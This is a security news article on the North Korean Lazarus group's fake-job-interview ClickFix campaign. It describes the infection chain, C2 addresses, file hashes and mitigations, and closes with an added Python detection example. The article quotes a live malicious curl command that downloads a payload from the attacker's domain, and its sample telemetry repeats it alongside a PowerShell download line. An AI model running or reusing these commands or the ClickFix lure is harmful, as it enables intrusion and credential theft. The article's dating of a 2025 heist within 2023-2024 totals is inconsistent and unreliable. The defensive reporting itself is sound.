Lazarus Weaponizes Fake Job Interviews With ClickFix Malware
North Korean APT-Q-1 now combines fraudulent cryptocurrency job postings with ClickFix social engineering to deploy GolangGhost backdoor and BeaverTail stealer.
North Korea's Lazarus group has added the ClickFix social engineering technique to its arsenal, using fraudulent job interviews at fake cryptocurrency companies to trick victims into installing malware. Security researchers at Qi'anxin documented the campaign, which they track as "ClickFake Interview."
The attack combines Lazarus's established fake recruitment infrastructure with the ClickFix technique that has become a dominant initial access method over the past year. Victims think they're troubleshooting a camera issue during a job interview. They're actually executing commands that install a backdoor.
How the Attack Works
The campaign targets employees at centralized finance (CeFi) organizations, impersonating companies like Coinbase, KuCoin, and Kraken. Victims receive enticing job offers that direct them to attacker-controlled interview websites.
During the simulated interview, the malicious site claims the victim's camera configuration is malfunctioning. The "solution" appears to be a legitimate Nvidia software update. What actually happens:
- Malicious JavaScript copies a PowerShell command to the victim's clipboard
- The site instructs victims to press Windows+R and paste a "verification code"
- The pasted command downloads ClickFix-1.bat from attacker infrastructure
- The batch script fetches and extracts a malicious archive disguised as Nvidia drivers
The batch file executes this download sequence:
curl -k -o "%TEMP%\nvidiaRelease.zip" https://driverservices.store/visiodrive/nvidiaRelease.zip
From there, the infection chain branches on the target's operating system: Windows 11 systems receive a dedicated backdoor (drvUpdate.exe), while the BeaverTail JavaScript stealer is deployed regardless of platform.
Malware Components
The attack deploys multiple payloads:
drvUpdate.exe - A backdoor targeting Windows 11 systems (build 22000+) that connects to 103.231.75.101:8888. It supports command execution via cmd.exe, file read/write operations, and system reconnaissance. The malware achieves persistence through registry modification of startup keys.
BeaverTail - A cross-platform information stealer delivered via main.js that requires Node.js. It communicates with a secondary C2 at 45.159.248.110 and targets browser credentials, cryptocurrency wallet data, and system information.
GolangGhost - A Go-based backdoor that provides file download/upload capabilities, shell command execution, a Chrome credential stealer, and system information harvesting.
Why Lazarus Keeps Targeting Crypto
Lazarus has made cryptocurrency theft a core revenue stream for the North Korean regime. The group stole roughly $2 billion in virtual assets during 2023-2024, including the $1.5 billion Bybit heist in March 2025.
Fake job interviews work particularly well against crypto companies because:
- The industry has high turnover and aggressive recruiting
- Remote work is normalized, making video interviews the default
- Technical staff expect to troubleshoot software during onboarding
- Cryptocurrency employees often have direct access to wallet infrastructure
The ClickFix addition makes these attacks more effective. Rather than sending malicious attachments that security tools might catch, Lazarus manipulates victims into executing commands themselves—bypassing many automated defenses. Iran's APT42 ran a parallel campaign targeting WhatsApp and Gmail accounts in the Middle East, showing that social engineering remains the go-to vector for state-backed groups.
Detection and Defense
Organizations can identify this campaign through several indicators:
Network IOCs:
- C2 server: 103.231.75.101:8888 (drvUpdate.exe)
- C2 server: 45.159.248.110 (BeaverTail)
- Download domain: driverservices.store
File Hashes (MD5):
- ClickFix-1.bat: a4e58b91531d199f268c5ea02c7bf456
- nvidiaRelease.zip: f9e18687a38e968811b93351e9fca089
- run.vbs: 3ef7717c8bcb26396fc50ed92e812d13
- main.js (BeaverTail): b52e105bd040bda6639e958f7d9e3090
- drvUpdate.exe: 6175efd148a89ca61b6835c77acc7a8d
Behavioral Indicators:
- PowerShell execution following clipboard paste operations
- Registry modifications to Run keys by unsigned executables
- Node.js processes spawned from temporary directories
- Outbound connections to non-standard ports from driver-named executables
Recommended Mitigations
- Train employees on ClickFix attacks - Staff should understand that legitimate software never asks users to paste commands into Run dialogs
- Block known IOCs - Add the C2 IPs and download domain to network blocklists
- Monitor for suspicious execution chains - Alert on curl/PowerShell downloading archives to temp directories
- Implement application allowlisting - Prevent execution of unsigned binaries from user-writable locations
- Verify job postings independently - Contact companies through official channels rather than links in unsolicited messages
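To make the behavioral indicators and the execution-chain monitoring above concrete, here is an added Python example (not from the article or from Qi'anxin's report) that scores constructed Sysmon-style process and registry events for the ClickFix chain described in this campaign and alerts only when a host shows two or more distinct indicators; the hostnames, user paths and the .bat download URL are assumptions.

```python
import re
from collections import defaultdict

# Patterns for the behavioural indicators listed in the article.
TEMP_DIR = re.compile(r"(%temp%|\\temp\\)", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
ARCHIVE_DL = re.compile(r"\b(curl|invoke-webrequest|iwr|wget)\b.*\.(zip|rar|7z)\b", re.IGNORECASE)

def classify(event: dict) -> list:
    """Return the indicator names one event matches (empty if nothing matched)."""
    hits = []
    image = event["image"].lower()
    if event["type"] == "process":
        # A shell parented by explorer.exe is what a Win+R paste looks like; noisy alone.
        if event["parent"].lower().endswith("explorer.exe") and image.endswith(("powershell.exe", "cmd.exe")):
            hits.append("shell_from_run_dialog")
        if ARCHIVE_DL.search(event["cmdline"]) and TEMP_DIR.search(event["cmdline"]):
            hits.append("archive_download_to_temp")
        if image.endswith("node.exe") and TEMP_DIR.search(image):
            hits.append("node_from_temp")
    elif event["type"] == "registry":
        if RUN_KEY.search(event["target"]) and not event["signed"]:
            hits.append("unsigned_run_key_persistence")
    return hits

def hosts_to_alert(events: list, min_indicators: int = 2) -> list:
    """Hosts showing at least min_indicators distinct indicators, sorted by name."""
    seen = defaultdict(set)
    for e in events:
        seen[e["host"]].update(classify(e))
    return sorted(h for h, s in seen.items() if len(s) >= min_indicators)

# Constructed sample telemetry (hostnames, user paths and the .bat URL are invented).
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c iwr https://attacker.invalid/ClickFix-1.bat -OutFile %TEMP%\ClickFix-1.bat"},
    {"host": "WS01", "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl -k -o "%TEMP%\nvidiaRelease.zip" https://driverservices.store/visiodrive/nvidiaRelease.zip'},
    {"host": "WS01", "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\nvidiaRelease\node.exe", "cmdline": "node.exe main.js"},
    {"host": "WS01", "type": "registry", "signed": False,
     "image": r"C:\Users\alice\AppData\Local\Temp\nvidiaRelease\drvUpdate.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\drvUpdate"},
    # Benign: a user opening PowerShell from the Start menu on another host.
    {"host": "WS02", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe"},
]
```

Running `hosts_to_alert(SAMPLE_EVENTS)` flags only WS01, since WS02's lone explorer-to-PowerShell launch stays below the two-indicator threshold.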
The combination of social engineering and technical deception demonstrates why security awareness training remains essential. Lazarus doesn't need zero-days when psychological manipulation works this well. Mobile device compromises at scale are a growing concern too—the FBI tracked BadBox 2.0 malware on over a million Android devices. China's Mustang Panda is also evolving, deploying CoolClient backdoor with browser-based info stealing capabilities for targeted espionage.